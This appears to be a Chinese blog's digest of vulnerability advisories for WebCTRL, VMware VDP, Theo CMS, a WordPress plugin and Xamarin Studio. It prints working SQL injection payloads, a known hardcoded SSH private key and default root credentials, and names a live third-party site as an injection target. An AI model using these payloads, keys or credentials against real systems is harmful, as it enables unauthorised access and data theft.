博文

Automated Logic WebCTRL6.5_Unrestricted_File_Upload_RCE

产品介绍:         Automated Logic WebCTRL 是一个楼宇自动化系统,可以自动收集并展现楼宇使用中产生的各种信息,例如温度、舒适度等。
漏洞介绍:         WebCTRL的v6.5版本及之前,存在一个不受限的文件上传漏洞,可以导致远程命令执行。
POC:
请移步到github获取测试脚本:Automated Logic WebCTRL6.5_Unrestricted_File_Upload_RCE.py

AD

VDP_ssh_priv_key

产品介绍:         VMware vSphere Data Protection简称VDP,是VMware环境的一个备份恢复解决方案。是一个基于磁盘的备份和恢复解决方案,可靠且易于部署。VDP 与 VMware vCenter Server 完全集成,可以对备份作业执行有效的集中式管理,同时将备份存储在经过重复数据消除的目标存储中。          vSphere Data Protection 只能通过 vSphere Web Client 进行管理。vSphere Client 不支持 vSphere DataProtection 管理。 漏洞说明:在VMware vSphere Data Protection的5.5.x到6.1.x版本中,存在一个已知的ssh私钥文件,可以让本地用户无需输入密码,切换到root权限。 检测特征:其web控制台访问地址为:https://url:8543/vdp-configure/,可能的登录凭证:root/changeme VDP登录凭证要求:九个字符,至少一个大写字母,至少一个小写字母,至少一个数字,不含特殊字符。 SSH私钥文件:         -----BEGIN RSA PRIVATE KEY----- MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X /PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16 9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3 Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO c2ne0wJBANBt3t84…

Theo_CMS2.0_SQLInjection

产品介绍         Theo是一个可以用于多种网站的,超轻量级的内容管理系统(CMS)
漏洞介绍漏洞出现的地方位于使用管理员登录系统的时候,在使用HTTP1.0协议进行访问该应用,admin.php页面的cat变量存在SQL注入漏洞。
POC/theocms/core/admin.php?cat=0+union+select+1,@@version,3,4+from+cfgs /theocms/core/admin.php?cat=0+union+select+1,@@hostname,3,4+from+cfgs
/theocms/core/admin.php?cat=0+union+select+1,concat(cfg,data),3,4+from+cfgs

WordPress_FAdvertisement_Plugin_Sqli

WordPress FAdvertisement Plugin Sql Injection Vul 2017/08/13 APA Golestan - GuCert Windows 10 & Kali Linux 漏洞位置:/Redirect.php
POC: inurl:/wp-content/plugins/FAdvertisement/Redirect.php?id=

http://site/wp-content/plugins/FAdvertisement/Redirect.php?id=[SQL-Injection]

http://negaheghtesadi.ir/wp-content/plugins/FAdvertisement/Redirect.php?id=11'

XamarinStudio_Mac_API_privilege_Escp

XamarinStudio中Mac平台API更新机制漏洞导致本地权限提升/绕过

产品介绍         Xamarin Studio是一个综合开发环境(IDE),可以创建创建iOS,Mac和Android应用程序。默认情况下支持C#和F#的开发。
漏洞介绍         Xamarin Studio为MAC平台提供的API文档更新机制使用root权限进行执行,这个更新进制存在安全问题,可以导致本地权限提升漏洞。 研究人员进行测试后,已经确定在v6.2.1 (build 3) 和v 6.3 (build 863)两个版本存在该漏洞
漏洞分析首先,更新脚本使用了不安全的工作目录,更新脚本会在/tmp目录下被创建,虽然有随机化的脚本进程标识。但是这个随机是存在一定顺序的,攻击者可以进行预测,或者直接提前(以符号链接形式)创建所有有可能使用的文件夹。 其次,更新脚本在执行时多错误检查不足,在发生错误时,会继续进行执行下一个命令。          TMPDIR=/tmp/ios-docs-download.$$ ,该文件夹用于存储稍后由mdoc程序使用的一些.NET程序集文件(DLL),假如“~/Library/Developer/Shared/Documentation/DocSets”该目录不存在,更新脚本将会从互联网下载一个DMG文件,如何从DMG文件中提取文件并挂载。因为前面提到攻击者可以控制工作目录路径,所以可以变相控制提取文件的路径。 在DMG文件挂载和提取文件之前,脚本会首先根据硬编码MD5值检查DMG文件的hash。但是可以利用pipe(